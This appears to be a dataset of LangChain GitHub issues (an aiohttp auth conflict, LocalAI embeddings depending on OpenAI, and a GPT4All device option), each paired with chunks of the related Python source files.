The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""DELETE the URL and return the text asynchronously."""
async with self._arequest("DELETE", url, auth=self.auth, **kwargs) as response:
yield response
class TextRequestsWrapper(BaseModel):
"""Lightweight wrapper around requests library.
The main purpose of this wrapper is to always return a text output.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
auth: Optional[Any] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def requests(self) -> Requests:
return Requests(
headers=self.headers, aiosession=self.aiosession, auth=self.auth
)
def get(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text."""
return self.requests.get(url, **kwargs).text
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text."""
return self.requests.post(url, data, **kwargs).text
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | """PATCH the URL and return the text."""
return self.requests.patch(url, data, **kwargs).text
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text."""
return self.requests.put(url, data, **kwargs).text
def delete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text."""
return self.requests.delete(url, **kwargs).text
async def aget(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text asynchronously."""
async with self.requests.aget(url, **kwargs) as response:
return await response.text()
async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text asynchronously."""
async with self.requests.apost(url, data, **kwargs) as response:
return await response.text()
async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text asynchronously."""
async with self.requests.apatch(url, data, **kwargs) as response:
return await response.text()
async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text asynchronously."""
async with self.requests.aput(url, data, **kwargs) as response:
return await response.text()
async def adelete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text asynchronously."""
async with self.requests.adelete(url, **kwargs) as response:
return await response.text()
RequestsWrapper = TextRequestsWrapper |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: LocalAIEmbeddings) -> Callable[[Any], Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | import openai
min_seconds = 4
max_seconds = 10
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: LocalAIEmbeddings) -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | import openai
min_seconds = 4
max_seconds = 10
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable:
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
def _check_response(response: dict) -> dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | if any(len(d["embedding"]) == 1 for d in response["data"]):
import openai
raise openai.error.APIError("LocalAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response)
return await _async_embed_with_retry(**kwargs)
class LocalAIEmbeddings(BaseModel, Embeddings):
"""LocalAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set to a random string. You need to
specify ``OPENAI_API_BASE`` to point to your LocalAI service endpoint.
Example:
.. code-block:: python
from langchain.embeddings import LocalAIEmbeddings |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | openai = LocalAIEmbeddings(
openai_api_key="random-key",
openai_api_base="http://localhost:8080"
)
"""
client: Any
model: str = "text-embedding-ada-002"
deployment: str = model
openai_api_version: Optional[str] = None
openai_api_base: Optional[str] = None
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the LocalAI request."""
headers: Any = None
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
class Config: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | """Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | """Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | )
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict:
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_proxy:
import openai
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
}
return openai_args
def _embedding_func(self, text: str, *, engine: str) -> List[float]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | """Call out to LocalAI's embedding endpoint."""
if self.model.endswith("001"):
text = text.replace("\n", " ")
return embed_with_retry(
self,
input=[text],
**self._invocation_params,
)["data"][
0
]["embedding"]
async def _aembedding_func(self, text: str, *, engine: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint."""
if self.model.endswith("001"):
text = text.replace("\n", " ")
return (
await async_embed_with_retry(
self,
input=[text],
**self._invocation_params,
)
)["data"][0]["embedding"]
def embed_documents( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to LocalAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
return [self._embedding_func(text, engine=self.deployment) for text in texts]
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to LocalAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
embeddings = []
for text in texts:
response = await self._aembedding_func(text, engine=self.deployment)
embeddings.append(response)
return embeddings
def embed_query(self, text: str) -> List[float]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | """Call out to LocalAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embedding = self._embedding_func(text, engine=self.deployment)
return embedding
async def aembed_query(self, text: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embedding = await self._aembedding_func(text, engine=self.deployment)
return embedding |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | from functools import partial
from typing import Any, Dict, List, Mapping, Optional, Set
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra, Field, root_validator
class GPT4All(LLM): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """GPT4All language models.
To use, you should have the ``gpt4all`` python package installed, the
pre-trained model file, and the model's config information.
Example:
.. code-block:: python
from langchain.llms import GPT4All
model = GPT4All(model="./models/gpt4all-model.bin", n_threads=8)
# Simplest invocation
response = model("Once upon a time, ")
"""
model: str
"""Path to the pre-trained GPT4All model file."""
backend: Optional[str] = Field(None, alias="backend")
max_tokens: int = Field(200, alias="max_tokens")
"""Token context window."""
n_parts: int = Field(-1, alias="n_parts")
"""Number of parts to split the model into.
If -1, the number of parts is automatically determined."""
seed: int = Field(0, alias="seed")
"""Seed. If -1, a random seed is used."""
f16_kv: bool = Field(False, alias="f16_kv")
"""Use half-precision for key/value cache."""
